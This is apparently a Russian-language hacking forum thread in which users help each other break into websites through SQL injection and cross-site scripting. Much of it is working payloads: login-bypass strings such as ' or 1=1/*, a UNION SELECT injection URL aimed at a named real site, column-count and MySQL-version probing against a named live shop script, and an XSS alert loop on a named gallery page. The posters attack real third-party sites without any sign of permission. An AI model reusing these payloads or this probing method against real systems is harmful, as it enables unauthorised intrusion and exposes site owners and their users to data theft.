Вобще в данном случае я наверное это бы и посоветовал, но хочу сказать, что в некоторых случаях наличие пробела после -- обязательно, и я думаю если в скрипте подставляется кавычка, то это так и есть, вобщем все как блеки описал, но только в конце пробел
login=31337 or 1=1-- pass=qwerty Такое не прокатывать, т.е. мой запрос добавляется в where login='reallogin' запрос /*, мне надо знать хотя бы один реальный логин, а я незнаю, как можно в таких случаях поступить, кроме перебора логинов, очень надо.
Если есть иньекция, очень врядле. что те нужно знать логин. ПРобуй ввести как в логин, так и в пароль: ' or 1=1/* ') or 1=1/* ')) or 1=1/* ') or ('1'='1 Вобўем сам эксперементіруй. И ещё многое зависит от того, какой серв БД там стоит!
можно ли как нибудь вывести слово на страницу через запрос? ведь есть серваки где не показываетсая отчет об ошибке и не понятно есть ли так sql inc
Да. Вот ссылка для примера. Code: http://adena.ru/keys.php?id=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,'%3CH1%3E%D0%92%D0%AB%D0%92%D0%9E%D0%94%D0%98%D0%9C%D0%AB%D0%99%20%D0%A2%D0%95%D0%9A%D0%A1%D0%A2%3C/H1%3E',22/*
2 bag Сформулируй вопрос яснее.Если ты имеешь ввиду как узнать есть ли инъекция при отключенных ошибках сервера то нужно почитать статьи т.к способов очень много и сдесь их все не изложишь Например эту: _http://forum.antichat.ru/threadnav43966-1-10.html Ну а вооще какой вопрос -такой ответ Dima-k17 написал тебе именно то ,что ты спросил
да я имею ввиду как узнать есть ли инъекция при отключенных ошибках сервера, статьи читал, я ищу более менее универсальный метод, вывод текста на страницу было бы самое то
Столкнулся с такой проблемкой, мб поможете... Начнем с начала Описание уязвимости - http://www.securitylab.ru/vulnerability/312412.php Нашол бажный скрипт - http://viscali.com/shop/main_bigware_53.php Начал подбирать кол-во полей: http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+1/* - нет ошибки http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+group+by+2/* - ошибка Исходя из этого сделал вывод что столбец у нас один. Далее http://viscali.com/shop/main_bigware_53.php?op=results&pollid=-1+union+select+1/* Выдает ошибку... Почему, ведь количество столбцов верное?
очень возможно, что там подряд идет два запроса, отсюда , когда у тебя верен первый, второй возвращает ложь.
http://viscali.com/shop/main_bigware_53.php?op=results&pollid=1+and+substring(version(),1,1)=3 мускул третий, нет юниона
Только учусь! ----------------------- Подскажите, на что это я наткнулся и как это можно использовать? вывод в номерах фоток Я такого еще не встречал, подскажите.
Вот прошу) Code: http://tangocamp.org.ua/gallery?photo=%3Cscript%3Ewhile(1)alert()%3C/script%3E можно это XSS, читай маны
Спасибо! xss я видел, но подумал, что это еще одна ошибка и к той не имеет отношения. Я ж говорю, что не встречал еще такого, чтоб просто менялся текст без вывода какой либо ошибки
